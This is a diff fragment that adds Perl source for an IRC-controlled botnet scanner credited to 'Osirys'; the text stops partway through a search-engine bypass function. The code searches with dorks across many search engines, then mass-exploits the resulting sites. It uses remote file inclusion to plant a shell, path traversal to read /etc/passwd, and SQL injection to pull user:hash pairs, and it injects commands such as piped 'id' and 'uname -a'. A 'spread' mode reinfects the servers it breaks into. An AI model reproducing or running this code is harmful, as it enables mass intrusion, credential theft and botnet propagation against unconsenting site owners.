admin($nick); + if ($val == 1) { + if ($mode =~ /ON/) { + $securityACT = 1; + sleep(2); + pm($nick,"15,1[+] 12,9Security Mode Activated !!"); + writ1("15,1[+] 12,9Security Mode Activated !!"); + } + elsif ($mode =~ /OFF/) { + $securityACT = 0; + sleep(2); + pm($nick,"15,1[+] 12,4Security Mode Disabled !!"); + writ1("15,1[+] 12,4Security Mode Disabled !!"); + } + } +} + +sub spread() { + my $nick = $_[0]; + my $mode = $_[1]; + my $reply = $_[2]; + my $val = admin($nick); + if ($val == 1) { + if ($mode =~ /ON/) { + $spreadACT = 1; + sleep(2); + if ($reply =~ /a/) { + pm($nick, "15,1[+] 12,9Spread Mode Activated !!"); + } + writ1("15,1[+] 12,9Spread Mode Activated !!"); + } + elsif ($mode =~ /OFF/) { + $spreadACT = 0; + sleep(2); + if ($reply =~ /a/) { + pm($nick, "15,1[+] 12,4Spread Mode Disabled !!"); + } + writ1("15,1[+] 12,4Spread Mode Disabled !!"); + } + } + else { + pm($nick,"4,1[!] You are not authorized to execute this command!"); + } +} + +sub sspread() { + my $nick = $_[0]; + my $host = $_[1]; + my $val = admin($nick); + if ($val == 1) { + my $host =~ s/http:\/\///; + writ1("15,1[+] 9,1Trying to spread on $host .."); + my $tspread = "http://".$host.$spread."?"; + &query($tspread); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } +} + +sub rfi_cheek() { + my $bug = $_[0]; + my $dork = $_[1]; + my $rfipid = $_[2]; + my $chek = $_[3]; + my $nick = $_[4]; + if ($chek =~ /j/) { + &rfi_scan($bug, $dork, $rfipid); + } + elsif ($chek =~ /s/) { + my $val = admin($nick); + if ($val == 1) { + &rfi_scan($bug, $dork, $rfipid); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } + } +} + +sub rfi_scan() { + my $bug = $_[0]; + my $dork = $_[1]; + my $rfipid = $_[2]; + writ1("4,1[*] 9,1RFI Scan started -> $rfipid sites/process"); + writ1("9,1[+] Bug: $bug"); + $d0rk = clean($dork); + writ1("4,1[+] Dork: $d0rk"); + my $a = $k . "a"; + my $n4me = $a . "siti.txt"; + find($d0rk, $n4me); + rfi($bug, $n4me, $d0rk, $rfipid); + writ1("4,1[-] RFI Scan finished 9,1 >15,1 $d0rk"); + writ1("11,1[й] # Coded by Osirys"); + exit(0); +} + +sub lfi_cheek() { + my $bug = $_[0]; + my $dork = $_[1]; + my $chek = $_[2]; + my $nick = $_[3]; + if ($chek =~ /j/) { + &lfi_scan($bug, $dork); + } + elsif ($chek =~ /s/) { + my $val = admin($nick); + if ($val == 1) { + &lfi_scan($bug, $dork); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } + } +} + +sub lfi_scan() { + my $bug = $_[0]; + my $dork = $_[1]; + writ1("4,1[*] 7,1LFI Scan started "); + writ1("9,1[+] Bug: $bug"); + $d0rk = clean($dork); + writ1("4,1[+] Dork: $d0rk"); + my $b = $k . "b"; + my $n4me = $b . "siti.txt"; + find($d0rk, $n4me); + lfi($bug, $n4me, $d0rk); + writ1("4,1[-] LFI Scan finished 9,1 >15,1 $d0rk"); + writ1("11,1[й] # Coded by Osirys"); + exit(0); +} + +sub sql_cheek() { + my $bug = $_[0]; + my $dork = $_[1]; + my $sqlpid = $_[2]; + my $chek = $_[3]; + my $nick = $_[4]; + if ($chek =~ /j/) { + &sql_scan($bug, $dork, $sqlpid); + } + elsif ($chek =~ /s/) { + my $val = admin($nick); + if ($val == 1) { + &sql_scan($bug, $dork, $sqlpid); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } + } +} + +sub sql_scan() { + my $bug = $_[0]; + my $dork = $_[1]; + my $sqlpid = $_[2]; + writ1("4,1[*] 15,1SQL Inj Scan started -> $sqlpid sites/process"); + writ1("9,1[+] Bug: $bug"); + $d0rk = clean($dork); + writ1("4,1[+] Dork: $d0rk"); + my $c = $k . "c"; + my $n4me = $c . "siti.txt"; + find($d0rk, $n4me); + sql($bug, $n4me, $d0rk, $sqlpid); + writ1("4,1[-] SQL Scan finished 9,1 >15,1 $d0rk"); + writ1("11,1[й] # Coded by Osirys"); + exit(0); +} + +sub rce_cheek() { + my $bug = $_[0]; + my $dork = $_[1]; + my $rcepid = $_[2]; + my $chek = $_[3]; + my $nick = $_[4]; + if ($chek =~ /j/) { + &rce_scan($bug, $dork, $rcepid); + } + elsif ($chek =~ /s/) { + my $val = admin($nick); + if ($val == 1) { + &rce_scan($bug, $dork, $rcepid); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } + } +} + +sub rce_scan() { + my $bug = $_[0]; + my $dork = $_[1]; + my $rcepid = $_[2]; + writ1("4,1[*] 0,12RCE Scan started -> $sqlpid sites/process"); + writ1("9,1[+] Bug: $bug"); + $d0rk = clean($dork); + writ1("4,1[+] Dork: $d0rk"); + my $c = $k . "c"; + my $n4me = $c . "siti.txt"; + find($d0rk, $n4me); + rce($bug, $n4me, $d0rk, $sqlpid); + writ1("4,1[-] RCE Scan finished 9,1 >15,1 $d0rk"); + writ1("11,1[й] # Coded by Osirys"); + exit(0); +} + +sub mass_cheek() { + my $kind = $_[0]; + my $bug = $_[1]; + my $dork = $_[2]; + my $mpid = $_[3]; + my $chek = $_[4]; + my $nick = $_[5]; + if ($chek =~ /j/) { + &mass_scan($kind, $bug, $dork, $mpid); + } + elsif ($chek =~ /s/) { + my $val = admin($nick); + if ($val == 1) { + &mass_scan($kind, $bug, $dork, $mpid); + } + else { + writ1("4,1[!] You are not authorized to execute this command!"); + } + } +} + +sub mass_scan() { + my $kind = $_[0]; + my $bug = $_[1]; + my $dork = $_[2]; + my $mpid = $_[3]; + my @engine; + my $c = $k."MASS"; + my $n4me = $c."siti.txt"; + my $g = $k."G"; my $a = $k."A"; my $y = $k."Y"; my $m = $k."M"; + my $gname = $g."siti.txt"; + my $aname = $a."siti.txt"; + my $yname = $y."siti.txt"; + my $mname = $m."siti.txt"; + my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N"); + my $ytest = ("http://it.search.yahoo.com/search?p=ciao&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=0"); + my $re = query1($gtest); my $re2 = query($ytest); + if (($re !~ /Google Home/)&&($re2 !~ /<p>1 - 100 di circa/)) { + writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON ALLTHEWEB/MSN (Google&Yahoo banned) -> $mpid sites/process"); + writ1("9,1[+] Bug: $bug"); + writ1("4,1[+] Dork: $dork"); + $engine[0] = fork(); + if ($engine[0] == 0) { + &M_Super($dork, $mname); + exit(0); + } + $engine[1] = fork(); + if ($engine[1] == 0) { + &A_Super($dork, $aname); + exit(0); + } + foreach my $e(@engine){ + waitpid($e,0); + } + open($file, ">>", $n4me); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); + foreach my $e(<Alltheweb>){ + print $file "$e\n"; + } + foreach my $e(<Msn>){ + print $file "$e\n"; + } + close(Alltheweb); close(Msn); close($file); + remove($aname,$mname); + } + elsif (($re =~ /Google Home/)&&($re2 !~ /<p>1 - 100 di circa/)) { + writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON GOOGLE/ALLTHEWEB/MSN (Yahoo banned) -> $mpid sites/process"); + writ1("9,1[+] Bug: $bug"); + writ1("4,1[+] Dork: $dork"); + $engine[0] = fork(); + if ($engine[0] == 0) { + &G_Super($dork, $gname); + exit(0); + } + $engine[1] = fork(); + if ($engine[1] == 0) { + &M_Super($dork, $mname); + exit(0); + } + $engine[2] = fork(); + if ($engine[2] == 0) { + &A_Super($dork, $aname); + exit(0); + } + foreach my $e(@engine){ + waitpid($e,0); + } + open($file, ">>", $n4me); open(Google,"<",$gname); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); + foreach my $e(<Google>){ + print $file "$e\n"; + } + foreach my $e(<Alltheweb>){ + print $file "$e\n"; + } + foreach my $e(<Msn>){ + print $file "$e\n"; + } + close(Alltheweb); close(Google); close(Msn); close($file); + remove($gname,$aname,$mname); + } + elsif (($re !~ /Google Home/)&&($re2 =~ /<p>1 - 100 di circa/)) { + writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON ALLTHEWEB/YAHOO/MSN (Google banned) -> $mpid sites/process"); + writ1("9,1[+] Bug: $bug"); + writ1("4,1[+] Dork: $dork"); + $engine[0] = fork(); + if ($engine[0] == 0) { + &Y_Super($dork, $yname); + exit(0); + } + $engine[1] = fork(); + if ($engine[1] == 0) { + &M_Super($dork, $mname); + exit(0); + } + $engine[2] = fork(); + if ($engine[2] == 0) { + &A_Super($dork, $aname); + exit(0); + } + foreach my $e(@engine){ + waitpid($e,0); + } + open($file, ">>", $n4me); open(Yahoo,"<",$yname); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); + foreach my $e(<Yahoo>){ + print $file "$e\n"; + } + foreach my $e(<Alltheweb>){ + print $file "$e\n"; + } + foreach my $e(<Msn>){ + print $file "$e\n"; + } + close(Alltheweb); close(Yahoo); close(Msn); close($file); + remove($yname,$aname,$mname); + } + elsif (($re =~ /Google Home/)&&($re2 =~ /<p>1 - 100 di circa/)) { + writ1("4,1[*] 12,1MASS[9,1$kind12,1] SCAN STARTED ON GOOGLE, ALLTHEWEB, YAHOO, MSN -> $mpid sites/process"); + writ1("9,1[+] Bug: $bug"); + writ1("4,1[+] Dork: $dork"); + $engine[0] = fork(); + if ($engine[0] == 0) { + &G_Super($dork, $gname); + exit(0); + } + $engine[1] = fork(); + if ($engine[1] == 0) { + &Y_Super($dork, $yname); + exit(0); + } + $engine[2] = fork(); + if ($engine[2] == 0) { + &M_Super($dork, $mname); + exit(0); + } + $engine[3] = fork(); + if ($engine[3] == 0) { + &A_Super($dork, $aname); + exit(0); + } + foreach my $e(@engine){ + waitpid($e,0); + } + open($file, ">>", $n4me); open(Google,"<", $gname); open(Yahoo,"<",$yname); open(Alltheweb,"<",$aname); open(Msn,"<",$mname); + foreach my $e(<Google>){ + print $file "$e\n"; + } + foreach my $e(<Alltheweb>){ + print $file "$e\n"; + } + foreach my $e(<Yahoo>){ + print $file "$e\n"; + } + foreach my $e(<Msn>){ + print $file "$e\n"; + } + close(Alltheweb); close(Yahoo); close(Google); close(Msn); close($file); + remove($yname,$aname,$gname,$mname); + } + foreach my $e(@engine){ + waitpid($e,0); + } + sleep(5); + if ($kind =~ /rfi/) { + rfi($bug, $n4me, $dork, $mpid); + } + elsif ($kind =~ /lfi/) { + lfi($bug, $n4me, $dork); + } + elsif ($kind =~ /sql/) { + sql($bug, $n4me, $dork, $mpid); + } + elsif ($kind =~ /rce/) { + rce($bug, $n4me, $dork, $mpid); + } + writ1("4,1[-] 12,1MASS[9,1$kind12,1] SCAN FINESHED 9,1 >15,1 $dork"); + writ1("11,1[й] # Coded by Osirys "); + exit(0); +} + +sub find() { + my $dork = $_[0]; + my $name = $_[1]; + my @engine; + $engine[0] = fork(); + if ($engine[0] == 0) { + my @lycos = lycos($dork,$name); + writ1("9,1[~] 7,1>LYCOS : 11,1 ".scalar(@lycos)." 9,1 > 15,1 $dork"); + exit(0); + } + $engine[1] = fork(); + if ($engine[1] == 0) { + my @msn = msn($dork, $name); + writ1("9,1[~] 7,1>MSN : 11,1 ". scalar(@msn). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[2] = fork(); + if ($engine[2] == 0) { + my @yahoo = yahoo($dork, $name); + writ1("9,1[~] 7,1>YAHOO : 11,1 ". scalar(@yahoo). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[3] = fork(); + if ($engine[3] == 0) { + my @google = google($dork, $name); + writ1("9,1[~] 7,1>GOOGLE : 11,1 ". scalar(@google). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[4] = fork(); + if ($engine[4] == 0) { + my @allthewebe = alltheweb($dork, $name); + writ1("9,1[~] 7,1>ALLTHEWEB : 11,1 ". scalar(@allthewebe). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[5] = fork(); + if ($engine[5] == 0) { + my @virgilio = virgilio($dork, $name); + writ1("9,1[~] 7,1>VIRGILIO : 11,1 ". scalar(@virgilio). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[6] = fork(); + if ($engine[6] == 0) { + my @altavista = altavista($dork, $name); + writ1("9,1[~] 7,1>ALTAVISTA : 11,1 ". scalar(@altavista). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[7] = fork(); + if ($engine[7] == 0) { + my @ask = ask($dork, $name); + writ1("9,1[~] 7,1>ASK : 11,1 ". scalar(@ask). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[8] = fork(); + if ($engine[8] == 0) { + my @webde = webde($dork,$name); + writ1("9,1[~] 7,1>WEB.DE : 11,1 ". scalar(@webde). " 9,1 > 15,1 $dork"); + exit(0); + } + $engine[9] = fork(); + if ($engine[9] == 0) { + my @uol = uol($dork,$name); + writ1("9,1[~] 7,1>UOL : 11,1 ".scalar(@uol)." 9,1 > 15,1 $dork"); + exit(0); + } + $engine[10] = fork(); + if ($engine[10] == 0) { + my @abacho = abacho($dork,$name); + writ1("9,1[~] 7,1>ABACHO : 11,1 ".scalar(@abacho)." 9,1 > 15,1 $dork"); + exit(0); + } + foreach my $e(@engine){ + waitpid($e,0); + } + +} + +sub rfi() { + my $bug = $_[0]; + my $name = $_[1]; + my $dork = $_[2]; + my $rfipid = $_[3]; + my @forks; + my $num = 0; + open($file, "<", $name); + while (my $a = <$file>) { + $a =~ s/\n//g; + push(@tot,$a); + } + close($file); + remove($name); + my @toexploit = unici(@tot); + writ1("9,1[*] 4,1>EXPLOITABLES:  11,1 ".scalar(@toexploit)."  15,1 $dork"); + sleep(1); + writ1("4,1[+] 9,1ExPLoItIng STARTED !! "); + foreach my $site(@toexploit) { + my $test = "http://".$site.$bug.$id."??"; + $count++; + if ($count % $rfipid == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + $num = 0; + } + if($count %100 == 0){ + writ1("9,1[%] 15,1 _/ 11,1Exploiting  4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." "); + } + $forks[$num]=fork(); + if($forks[$num] == 0){ + my $test = "http://".$site.$bug.$id."??"; + my $print = "http://".$site.$bug.$shell."?"; + my $re = query($test); + if ($re =~ /Osirys/ && $re =~ /uid=/) { + os($test); + writ1("12(12,9safe: OFF12) (12,9os: $os12) 12,9$print"); + writ1("12(12,9uname -a12) 12 $un"); + writ1("12(12,9uid / gid12) 12 $id1"); + writ1("12(12,9hdd space12) 12 free: ($free) used: ($used) tot: ($all)"); + writ2(""); + writ2("12(12,9safe: OFF12) (12,9os: $os12) 12,9$print"); + writ2("12(12,9uname -a12) 12 $un 12(12,9uid12)12 $id1"); + if ($spreadACT == 1) { + writ1("15,1[+] 9,1Trying to spread .."); + sleep(2); + my $test2 = "http://".$site.$bug.$spread."?"; + &query($test2); + } + } + elsif ($re =~ /Osirys/) { + os($test); + writ1("12(12,4safe: ON12) (12,4os: $os12) 12,4$print"); + writ1("12(12,4uname -a12) 12 $un"); + writ1("12(12,4hdd space12) 12 free: ($free) used: ($used) tot: ($all)"); + writ2(""); + writ2("12(12,4safe: ON12) (12,4os: $os12) 12,4$print"); + if ($spreadACT == 1) { + writ1("15,1[+] 9,1Trying to spread .."); + sleep(2); + my $test2 = "http://".$site.$bug.$spread."?"; + &query($test2); + } + } + exit(0); + } + $num++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub lfi() { + my $bug = $_[0]; + my $name = $_[1]; + my $dork = $_[2]; + my @forks; + my $num = 0; + open($file, "<", $name); + while (my $a = <$file>) { + $a =~ s/\n//g; + push(@tot, $a); + } + close($file); + remove($name); + my @toexploit = unici(@tot); + writ1("9,1[*] 4,1>EXPLOITABLES:  11,1 ".scalar(@toexploit)."  15,1 $dork"); + writ1("4,1[+] 9,1ExPLoItIng STARTED !! "); + foreach my $site(@toexploit) { + $count++; + if ($count % 100 == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + $num = 0; + } + if ($count % 300 == 0) { + writ1("9,1[%] 15,1 _/ 11,1Exploiting  4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." "); + } + $forks[$num]=fork(); + if($forks[$num] == 0){ + my $inj = "../../../../../../../../../../../../../etc/passwd%00"; + my $test = "http://".$site.$bug.$inj; + my $print = "http://".$site.$bug.$inj; + my $re = query($test); + if ($re =~ /root:x:/) { + writ1("7(7,1LFI7) 9,1$print"); + writ2("7(7,1LFI7) 9,1$print"); + } + exit(0); + } + $num++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub sql() { + my $bug = $_[0]; + my $name = $_[1]; + my $dork = $_[2]; + my $sqlpid = $_[3]; + my @forks; + my $num = 0; + open($file, "<", $name); + while (my $a = <$file>) { + $a =~ s/\n//g; + push(@tot,$a); + } + close($file); + remove($name); + my @toexploit = unici(@tot); + writ1("9,1[*] 4,1>EXPLOITABLES:  11,1 ".scalar(@toexploit)."  15,1 $dork"); + writ1("4,1[+] 9,1ExPLoItIng STARTED !! "); + foreach my $site(@toexploit) { + my $test = "http://".$site.$bug; print "$test\n"; + $count++; + if($count %$sqlpid == 0){ + foreach my $f(@forks){ + waitpid($f,0); + } + $num = 0; + } + if($count %100 == 0){ + writ1("9,1[%] 15,1 _/ 11,1Exploiting  4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." "); + } + $forks[$num]=fork(); + if($forks[$num] == 0){ + my $test = "http://".$site.$bug; + my $print = "http://".$site.$bug; + my $re = query($test); + if ($re =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) { + my ($user,$hash) = ($1,$2); + if ($sqlpid == $sqlpidpr0c) { + writ1("9(9,12SQL INJ9) 15,12$print"); + writ1("9(9,12User9) 15,12$user"); + writ1("9(9,12Hash9) 15,12$hash"); + writ2("9(9,12SQL INJ9) 15,12$print"); + } + elsif ($sqlpid > $sqlpidpr0c) { + writ1("9(9,12SQL INJ9) 15,12$print"); + } + } + elsif ($re =~ m/:(.*)([0-9,a-f]{32})/g) { + my ($user,$hash) = ($1,$2); + $user =~ s/\<(.*)\>//g; + if ($user !~ /(\/|\<|\>|\")/) { + if ($sqlpid == $sqlpidpr0c) { + writ1("9(9,12SQL INJ9) 15,12$print"); + writ1("9(9,12User9) 15,12$user"); + writ1("9(9,12Hash9) 15,12$hash"); + writ2("9(9,12SQL INJ9) 15,12$print"); + } + elsif ($sqlpid > $sqlpidpr0c) { + writ1("9(9,12SQL INJ9) 15,12$print"); + } + } + } + elsif ($re =~ m/\"option\"><b>(.*)([0-9,a-f]{32})/g) { + my ($user,$hash) = ($1,$2); + $user =~ s/<(.*)>//g; + $user =~ s/<|>//g; + if ($sqlpid == $sqlpidpr0c) { + writ1("9(9,12SQL INJ9) 15,12$print"); + writ1("9(9,12User9) 15,12$user"); + writ1("9(9,12Hash9) 15,12$hash"); + writ2("9(9,12SQL INJ9) 15,12$print"); + } + elsif ($sqlpid > $sqlpidpr0c) { + writ1("9(9,12SQL INJ9) 15,12$print"); + } + } + exit(0); + } + $num++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub rce() { + my $bug = $_[0]; + my $name = $_[1]; + my $dork = $_[2]; + my $rcepid = $_[3]; + my @forks; + my $num = 0; + open($file, "<", $name); + while (my $a = <$file>) { + $a =~ s/\n//g; + push(@tot, $a); + } + close($file); + remove($name); + my @toexploit = unici(@tot); + writ1("9,1[*] 4,1>EXPLOITABLES:  11,1 ".scalar(@toexploit)."  15,1 $dork"); + writ1("4,1[+] 9,1ExPLoItIng STARTED !! "); + foreach my $site(@toexploit) { + $count++; + if ($count % $rcepid == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + $num = 0; + } + if ($count % 300 == 0) { + writ1("9,1[%] 15,1 _/ 11,1Exploiting  4,1 ".$count." 11,1 / 4,1 ".scalar(@toexploit)." "); + } + $forks[$num]=fork(); + if($forks[$num] == 0){ + my $inj = "|echo%20%22Osirys-p0wa%22;%20id|"; + my $inj1 = "|echo%20%22Osirys-p0wa%22;%20id"; + my $osinj = "|uname%20-a|"; + my $test = "http://".$site.$bug.$inj;print "$test\n"; + my $test1 = "http://".$site.$bug.$inj1; + my $os = "http://".$site.$bug.$osinj; + my $re = query($test); + my $re1 = query($test1); + if ($re =~ /Osirys-p0wa/ && $re =~ /uid=(.+?) gid/) { + rce_os($os); + writ1("0(0,12RCE0) 0,12$test"); + writ1("0(0,12OS0) 0,12$un_rce"); + writ2("0(0,12RCE0) 0,12$test"); + } + if ($re1 =~ /Osirys-p0wa/ && $re1 =~ /uid=(.+?) gid/) { + rce_os($os); + writ1("0(0,12RCE0) 0,12$test1"); + writ1("0(0,12OS0) 0,12$un_rce"); + writ2("0(0,12RCE0) 0,12$test1"); + } + exit(0); + } + $num++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub G_Super() { + my @domain = ("at","com.au","com.br","ca","ch","cn","de","dk","es","fr","it","co.jp","com.mx","co.uk"); + my @langs = ("de","en","br","en","de","cn","de","dk","es","fr","it","jp","es","en"); + my @country = ("AT","AU","BR","CA","CH","CN","DE","DK","ES","FR","IT","JP","MX","UK"); + my $dork = $_[0]; + my $fname = $_[1]; + my @forks; + my $count = 0; + my $dd = 0; + my $l = 0; + my $c = 0; + foreach my $d(@domain) { + if ($count % 1 == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + } + $forks[$count] = fork(); + if ($forks[$count] == 0) { + for ($i=0;$i<=1000;$i+=100) { + my $gsup = ("www.google.".$d."/search?q=".key($dork)."&num=100&hl=".$langs[$l]."&cr=country".$country[$c]."&as_qdr=all&start=".$i."&sa=N"); + my $re = query1($gsup); + while ($re =~ m/<a href=\"http:\/\/(.+?)\" class=l/g) { + my $h = $1; + if ($h !~ /google|<|>/) { + push(@sgrep,$h); + } + } + } + my @list = &fprint($fname,@sgrep); + writ1("9,1[*] 4,1>GOOGLE[9,1".$domain[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork"); + exit(0); + } + $l++; + $c++; + $count++; + $dd++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub A_Super() { + my $dork = $_[0]; + my @d00rk = ("at","com.au","com.br","ca","ch","cn","de","dk","es","fr","it","com.mx","co.uk"); + my $fname = $_[1]; + my @forks; + my $count = 0; + my $dd = 0; + foreach my $d(@d00rk) { + my $d0rk = "$dork domain:".$d00rk[$dd]; + if ($count % 1 == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + } + $forks[$count] = fork(); + if ($forks[$count] == 0) { + for ($i=0;$i<=1000;$i+=100) { + my $asup = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($d0rk)."&o=".$i); + my $re = query($asup); + while ($re =~ m/<span class=\"resURL\">http:\/\/(.+?) <\/span>/g) { + my $h = $1; + if ($h !~ /youtube|wikipedia/) { + push(@sgrep,$h); + } + } + } + my @list = &fprint($fname,@sgrep); + writ1("9,1[*] 4,1>ALLTHEWEB[9,1".$d00rk[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork"); + exit(0); + } + $count++; + $dd++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub Y_Super() { + my @domain = ("at","au","br","ca","de","es","fr","it","uk"); + my $dork = $_[0]; + my $fname = $_[1]; + my @forks; + my $count = 0; + my $dd = 0; + foreach my $d(@domain) { + if ($count % 1 == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + } + $forks[$count] = fork(); + if ($forks[$count] == 0) { + for ($i=0;$i<=1000;$i+=100) { + my $ysup = ("http://".$d.".search.yahoo.com/search?p=".key($dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=".$i); + my $re = query($ysup); + while ($re =~ m/<a class=\"yschttl\" href=\"http:\/\/(.+?)\" >/g) { + my $h = $1; + if ($h !~ /yahoo|<|>/) { + push(@sgrep,$h); + } + } + } + my @list = &fprint($fname,@sgrep); + writ1("9,1[*] 4,1>YAHOO[9,1".$domain[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork"); + exit(0); + } + $count++; + $dd++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub M_Super() { + my @domain = ("at","au","br","ca","de","fr","it"); + my $dork = $_[0]; + my $fname = $_[1]; + my @forks; + my $count = 0; + my $dd = 0; + foreach my $d(@domain) { + my $d0 = "$d-$d"; + if ($count % 1 == 0) { + foreach my $f(@forks){ + waitpid($f,0); + } + } + $forks[$count] = fork(); + if ($forks[$count] == 0) { + for ($i=1;$i<=501;$i+=10) { + my $msup = ("http://search.live.com/results.aspx?q=".key($dork)."&first=".$i."&FORM=PERE&FORM=MSNH&mkt=".$d0."&setlang=".$d0); + my $re = query($msup); + while ($re =~ m/<a href=\"http:\/\/(.+?)\" onmousedown/g) { + my $h = $1; + if ($h !~ /msn|live\.com|microsoft|WindowsLiveTranslator\.com/) { + push(@sgrep,$h); + } + } + } + my @list = &fprint($fname,@sgrep); + writ1("9,1[*] 4,1>MSN[9,1".$domain[$dd]."4,1] : 11,1 ".scalar(@list)." 9,1 > 15,1 $dork"); + exit(0); + } + $count++; + $dd++; + } + foreach my $f(@forks){ + waitpid($f,0); + } +} + +sub google() { + my @gsites; + my $dork = $_[0]; + my $name = $_[1]; + my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N"); + my $re = query1($gtest); + if ($re =~ /Google Home/) { + @gsites = gfind($dork,$name); + } + else { + writ1("4,1[!] 4,1Banned by Google Engine, BYPASS started !"); + @gsites = gbypass($dork,$name); + } + return @gsites; +} + +sub gfind() { + my $dork = $_[0]; + my $name= $_[1]; + for ($i = 0;$i <= 1200; $i += 100) { + my $glink = ("www.google.it/search?q=".key($dork)."&num=100&hl=it&as_qdr=all&start=".$i."&sa=N"); + my $re = query1($glink); + while ($re =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { + my $h = $1; + if ($h !~ /google/) { + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub gbypass() { # Euroseek uses the same search type of google + my $dork = $_[0]; + my $name = $_[1]; + for ($i = 0 ;$i <= 1000 ;$i += 10) { + my $gplink = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$i."&string=".key($dork)); + my $re = query($gplink); + while ($re =~ m/<a href=\"http:\/\/(.+?)\" class=\"searchlinklink\">/g) { + my $h = $1; + push(@sgrep,$h); + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub alltheweb() { + my $dork = $_[0]; + my $name = $_[1]; + for ($i = 0;$i <= 1000;$i += 100) { + my $alink = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($dork)."&o=".$i); + my $re = query($alink); + while ($re =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) { + my $h = $1; + $h =~ s/ //g; + push(@sgrep,$h); + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub altavista() { + my $dork = $_[0]; + my $name = $_[1]; + my $atest = ("http://it.altavista.com/web/results?itag=ody&q=".key($dork)."&kgs=0&kls=1"); + my $re = query($atest); + if ($re =~ /Sono stati trovati 0 risultati/) { + return @list; + } + else { + for ($i = 0;$i <= 1000;$i += 50){ + my $alink = ("http://it.altavista.com/web/results?itag=ody&kgs=0&q=".key($dork)."&stq=".$i); + my $re = query($alink); + while ($re =~ m/<span class=ngrn>(.+?)<\/span>/g) { + my $h = $1; + push(@sgrep,$h); + } + } + my @list = fprint($name,@sgrep); + return @list; + } +} + +sub msn() { + my $dork = $_[0]; + my $name = $_[1]; + for ($i = 1;$i <= 800;$i += 10) { + my $mlink = ( "http://search.live.com/results.aspx?q=".key($dork)."&first=".$i."&FORM=PERE" ); + my $re = query($mlink); + while ($re =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) { + my $h = $1; + if ($h !~ /msn|live/ ) { + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub yahoo() { + my @ysites; + my $dork = $_[0]; + my $name = $_[1]; + my $ytest = ("http://search.yahoo.com/search?p=".key($dork)."&fr=yfp-t-501&ei=UTF-8&rd=r1"); + my $re = query($ytest); + if ($re =~ /We did not find results for: <strong>/) { + return @ysites; + } + elsif ($re =~ /Yahoo! Search results/) { + @ysites = yfind($dork,$name); + return @ysites; + } + else { + writ1("4,1[!] 4,1Banned by Yahoo Engine, BYPASS started!"); + @ysites = ybypass($dork,$name); + return @ysites; + } +} + +sub yfind() { + my $dork = $_[0]; + my $name = $_[1]; + for ($i = 1;$i <= 901;$i += 100) { + my $ylink = ("http://search.yahoo.com/search?p=".key($dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=".$1); + my $re = query($ylink); + while ($re =~ m/<a class=\"yschttl\" href=\"http:\/\/(.+?)\" >/g) { + my $h = $1; + if ($h !~ /yahoo|<|>/) { + push(@sgrep,$h); + } + } + } + my @list = fprint($name,@sgrep); + return @list; +} + +sub ybypass() { # GoodSearch uses the same search type of Yahoo + my $dork = $_[0]; + my $name = $_[1]; + my $ybytest = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($dork)."&page=1&osmax=16"); + my $re = query($ybytest); + if ($re =~ /Your search did not yield any results/){ + return @list; + } + else { + for $i(1..50){ + my $ybylink = 